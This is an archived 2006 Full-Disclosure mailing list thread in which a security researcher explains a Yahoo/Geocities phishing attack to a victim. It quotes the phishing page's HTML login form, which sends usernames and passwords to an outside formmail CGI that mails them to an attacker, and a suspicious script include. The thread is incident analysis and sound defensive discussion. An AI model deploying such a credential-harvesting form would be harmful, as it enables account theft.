lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Mon, 14 Aug 2006 21:33:13 -0700
From: "Jain, Siddhartha" <Siddhartha.Jain@...-tencor.com>
To: <full-disclosure@...ts.grok.org.uk>
Subject: RE: Yahoo/Geocities possible exploit/vulnerability

Thanks for the explanation, Nick. Was indeed helpful. I am sure changing
the passwords blunts the attack but it sure feels stupid!!

The phishing apart, how can a userid be spoofed on Yahoo Messenger? Is
this something trivial? I thought Yahoo fixed the issue with Y!Messenger
5.0.


Thanks,

- Siddhartha



-----Original Message-----
From: full-disclosure-bounces@...ts.grok.org.uk
[mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of Nick
FitzGerald
Sent: Monday, August 14, 2006 6:01 PM
To: full-disclosure@...ts.grok.org.uk
Subject: Re: [Full-disclosure] Yahoo/Geocities possible
exploit/vulnerability

Jain, Siddhartha wrote:

> I was logged onto Yahoo Messenger (version 7.5 on WinXP SP2 Pro), when
I
> got a message from a friend's ID:
> Pxxxx Bxxxxx (8/14/2006 4:25:50 PM):  --->
> www.geocities.com/now_thats_funny_210/  
> 
> Clicking on the link took me to a page with the URL as above in the
> address bar and yahoo/geocities page that asks for username and
> password. On entering the username and password, the next page
displayed
> was my photo album on yahoo but the URL in the address bar still
> remained the same as above!! 

D'oh -- you've been phished!

Double-D'oh -- you announced it on Full-Disclosure!!

The URL you were sent is a phishing page.  The form submission code 
looks like the following (brain-damaged "smart" HTML rendering MUAs may 
start to suck about here -- if that's yours, get a better one):

  <legend>Login Form</legend>
  <FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi"
   ENCTYPE="x-www-form-urlencoded">
    <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
    <INPUT TYPE="hidden" NAME="Mail_To" VALUE="whoaenator@...il.com">
    <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
    <INPUT TYPE="hidden" NAME="Next_Page"
      value="http://photos.yahoo.com/ph//my_photos">
  [...]

Basically, your Yahoo ID and password were sent to an open "formmail" 
CGI at fiberbit.net which sent those details (plus some other stuff 
based on reverse DNS, etc of the apparent IP submitting the form) via 
Email to whoaenator@...il.com and then the form-processing CGI 
redirected your browser to your "real" Yahoo! Photos page, 
http://photos.yahoo.com/ph//my_photos.  If it did this without 
prompting you for login (as it did for me) I guess that means you had 
an already active Yahoo! session in your browser.

> Next thing I noticed that Yahoo Messenger had frozen.

My guess here is (thankfully I'm not a YIM expert) that YIM only allows 
one login per ID and kicks _old_ ones when a new session is initiated 
from an already active ID.  Thus getting logged out of YIM would mean 
that the bot picking up and processing whoaenator@...il.com's Emails 
had logged into YIM, presumably to send messages like the one you got 
to your whole contact list.  Lather, rinse, repeat...

> I changed my yahoo password and un-installed Yahoo Messenger.

Damage already done though, methinks.  I mean, good for changing your 
password, but as all I can see this doing for now is spimming that 
link, the damage is done.  Of course, changing your password means that 
they cannot re-use your credentials in future, should they recorded 
them for possible future use.

I suspect that this was also supposed to try to exploit some or other 
recent-ish IE security vulnerability, but due to incompetence on the 
part of the person setting it up, they fluffed this aspect of the 
intended "attack".  I mean, WTF otherwise is the explanation of this 
from the middle of the "now_thats_funny_210" page?

  <script language='javascript'
    src='http://127.0.0.1:1894/js.cgi?pcaw&r=4886'></script>

> When I asked my friend about the message, he said he didn't send the
> message but received a similar message from his wife in the morning
who
> hadn't sent it either.

They've both already been hit -- be nice and strongly commend them to 
change their passwords and then trace it back from his wife to whoever 
she got it from, et seq...


Regards,

Nick FitzGerald

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ